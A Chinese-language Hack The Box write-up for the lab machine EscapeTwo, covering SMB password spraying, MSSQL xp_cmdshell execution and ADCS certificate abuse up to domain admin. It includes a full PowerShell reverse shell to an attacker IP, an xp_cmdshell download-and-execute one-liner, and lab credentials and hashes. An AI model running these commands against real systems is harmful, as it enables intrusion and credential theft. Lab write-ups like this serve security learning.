HacktheBox-EscapeTwo

Natro922025-01-232025-01-27

写在之前

Season7 开始了。这个靶机提供了两个服务rose / KxEPkKe6R8su

这个靶机上来被 xp_cmdshell 非预期了，过了挺长时间才找到一份解决了的 Wp，这里学习下。

不懂为什么是 EZ、感觉和之前那个 Infiltrator 一个难度。

信息收集

nmap -sV -sC -O 10.10.11.51
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-22 23:26 CST
Nmap scan report for 10.10.11.51
Host is up (0.16s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-22 15:10:29Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-22T15:12:00+00:00; -16m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-22T15:11:59+00:00; -16m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   10.10.11.51:1433: 
|     Target_Name: SEQUEL
|     NetBIOS_Domain_Name: SEQUEL
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: DC01.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
|_ssl-date: 2025-01-22T15:12:00+00:00; -16m00s from scanner time.
| ms-sql-info: 
|   10.10.11.51:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-22T15:00:05
|_Not valid after:  2055-01-22T15:00:05
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-22T15:12:00+00:00; -16m00s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-22T15:11:59+00:00; -16m00s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-01-22T15:11:20
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -16m00s, deviation: 0s, median: -16m00s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.62 seconds

SMB

用提供的账号密码枚举访问 SMB 服务。

crackmapexec smb 10.10.11.51 -u rose -p KxEPkKe6R8su --users
SMB         10.10.11.51     445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.51     445    DC01             [+] sequel.htb\rose:KxEPkKe6R8su 
SMB         10.10.11.51     445    DC01             [+] Enumerated domain user(s)
SMB         10.10.11.51     445    DC01             sequel.htb\ca_svc                         badpwdcount: 0 desc:                  
SMB         10.10.11.51     445    DC01             sequel.htb\rose                           badpwdcount: 0 desc:                  
SMB         10.10.11.51     445    DC01             sequel.htb\sql_svc                        badpwdcount: 0 desc:                  
SMB         10.10.11.51     445    DC01             sequel.htb\oscar                          badpwdcount: 2 desc:                  
SMB         10.10.11.51     445    DC01             sequel.htb\ryan                           badpwdcount: 0 desc:                  
SMB         10.10.11.51     445    DC01             sequel.htb\michael                        badpwdcount: 1 desc:                  
SMB         10.10.11.51     445    DC01             sequel.htb\krbtgt                         badpwdcount: 1 desc: Key Distribution Center Service Account                                            
SMB         10.10.11.51     445    DC01             sequel.htb\Guest                          badpwdcount: 1 desc: Built-in account for guest access to the computer/domain                           
SMB         10.10.11.51     445    DC01             sequel.htb\Administrator                  badpwdcount: 0 desc: Built-in account for administering the computer/domain

smbclient 连接

1	smbclient -L 10.10.11.51 -U rose

用凭证连接独立的 Accounting Department

1	smbclient '//10.10.11.51/Accounting Department' -U rose

get 命令下载下来：

1 2	get accounting_2024.xlsx get accounts.xlsx

制作账号密码本，密码喷洒：

1	crackmapexec smb 10.10.11.51 -u users.txt -p passwords.txt

sequel.htb\Oscar:86LxLBMgEWaKUnBG 显示可以但是无法登录继续利用。

另外 MSSQL 也可以登录。

一看到 mssql 就想到了 xp_cmdshell 但是之前一直没打过。

这里正好学习一下。因为对方机器是 windows 机器，这里准备一个 ps 脚本用作反弹shell。

$LHOST = "10.10.16.59"; $LPORT = 7777; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()

把脚本用 http 服务挂载，然后用 mssql 连接 mssql 服务。

1	mssqlclient.py sequel.htb/sa:'MSSQLP@ssw0rd!'@10.10.11.51

输入命令：

1	EXEC xp_cmdshell 'echo IEX (New-Object Net.WebClient).DownloadString("http://10.10.16.59/shell.ps1") \| powershell -noprofile'

然而这里似乎没有开启 xp_cmdshell：

后来发现别人用了个这个工具： netexec

GitHub - Pennyw0rth/NetExec: The Network Execution Tool

首先查看权限：

1	./nxc mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth --list

提权，但似乎已经是高权限了。

1	./nxc mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth --module mssql_priv

这个 netexc 可以直接用-x命令执行

1	./nxc mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -x 'whoami'

权限是 sequel\sql_svc

查看都有哪些用户，能不能直接读取到 user.txt：

没权限，不能直接读。

这里很巧妙，mssql 这里可以读取到这个用户的账号和密码：

# 查看版本号
./nxc mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -q 'SELECT @@version'
# 读取
./nxc mssql 10.10.11.51 -u 'sa' -p 'MSSQLP@ssw0rd!' --local-auth -x 'type C:\SQL2019\ExpressAdv_enu\sql-Configuration.INI'

SEQUEL\sql_svc:WqSZAF6CysDQbGb3

但是这个不能被 winrm 登录。但是可以通过这个密码登录到 ryan 上。

然后 winrm 直接登录即可：

1	evil-winrm -i 10.10.11.51 -u ryan -p WqSZAF6CysDQbGb3

Administrator

使用 bloodhound 收集信息，这个会收集所有所需的内容保存为 json 内容。然后启动数据库，打开 GUI 页面开始分析。

1	bloodhound-python -u 'ryan' -p 'WqSZAF6CysDQbGb3' -d sequel.htb -ns 10.10.11.51 -c All

neo4j start打开数据库后打开 gui 导入 json。

然后左上角搜索 ryan 这个节点，然后在 OutBound Object Control 下的 Transitive Object Control 里面查看路线：

ryan 具有 CA_SVC 的权限。后者具有管理证书的权限。

RedTeaming_CheatSheet/windows-ad/Domain-Privilege-Escalation.md at main · 0xJs/RedTeaming_CheatSheet
Grant rights | The Hacker Recipes
Abusing Active Directory Certificate Services - Part One - Black Hills Information Security

后面这里又到了最喜欢的听不懂环节。这个提权确实有点抽象。

A certificate template with the ESC1 vulnerability allows low privileged users to enroll and request a certificate on behalf of any domain object specified by the user. This means that any user with enrollment rights can request a certificate for a privileged account such as a domain administrator.
__具有 ESC1 漏洞的证书模板允许低权限用户代表用户指定的任何域对象注册和请求证书。这意味着任何具有注册权限的用户都可以为特权帐户（如域管理员）请求证书。

我们对 ca_svc 具有 WriteOwner 权限，使用 BloodyAD 可以接管：（接管后 Ryan 获取到可以修改账户的权限）

1	bloodyAD --host 10.10.11.51 -d escapetwo.htb -u ryan -p WqSZAF6CysDQbGb3 set owner CA_SVC ryan

然后修改 CA_SVC 的 DACL（DACL 是 ACL 的一种特定类型，用于在 Windows 操作系统中管理对象访问。DACL 是对象安全描述符的一部分，定义了哪些用户或组对对象具有哪些访问权限。DACL 中的每个 ACE（访问控制条目）指定了特定用户或组的权限。）

1
2
3

impacket-dacledit  -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/"ryan":"WqSZAF6CysDQbGb3"
[*] DACL backed up to dacledit-20250119-224357.bak
[*] DACL modified successfully!

额然而这个没有运行成功。因此这里就断了，这里附上他的做法。certipy-ad 生成新的密钥凭证，启用基于证书的身份验证，保存的 ccache 文件可以用于 Kerberos 攻击。

1	certipy-ad shadow auto -u 'ryan@sequel.htb' -p "WqSZAF6CysDQbGb3" -account 'ca_svc' -dc-ip '10.10.11.51' -target dc01.sequel.htb -ns 10.10.11.51

修改证书模板，用于可以提升权限，可以允许使用提升的权限颁发证书。

KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad template  -k -template DunderMifflinAuthentication  -target dc01.sequel.htb -dc-ip 10.10.11.51
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'

请求具有 UPN（用户主体名称）Administrator@sequel.htb 的证书，从而启用 Administrator 的账户。

certipy-ad req -u ca_svc -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -target dc01.sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn Administrator@sequel.htb -ns 10.10.11.51 -dns 10.10.11.51
Certipy v4.8.2 - by Oliver Lyak (ly4k)

/usr/lib/python3/dist-packages/certipy/commands/req.py:459: SyntaxWarning: invalid escape sequence '\('
  "(0x[a-zA-Z0-9]+) \([-]?[0-9]+ ",
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 58
[*] Got certificate with multiple identifications
    UPN: 'Administrator@sequel.htb'
    DNS Host Name: '10.10.11.51'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator_10.pfx'

使用 Administrator 权限检索 NTLM

certipy-ad auth -pfx administrator_10.pfx -dc-ip 10.10.11.51
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Found multiple identifications in certificate
[*] Please select one:
    [0] UPN: 'Administrator@sequel.htb'
    [1] DNS Host Name: '10.10.11.51'
> 0
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff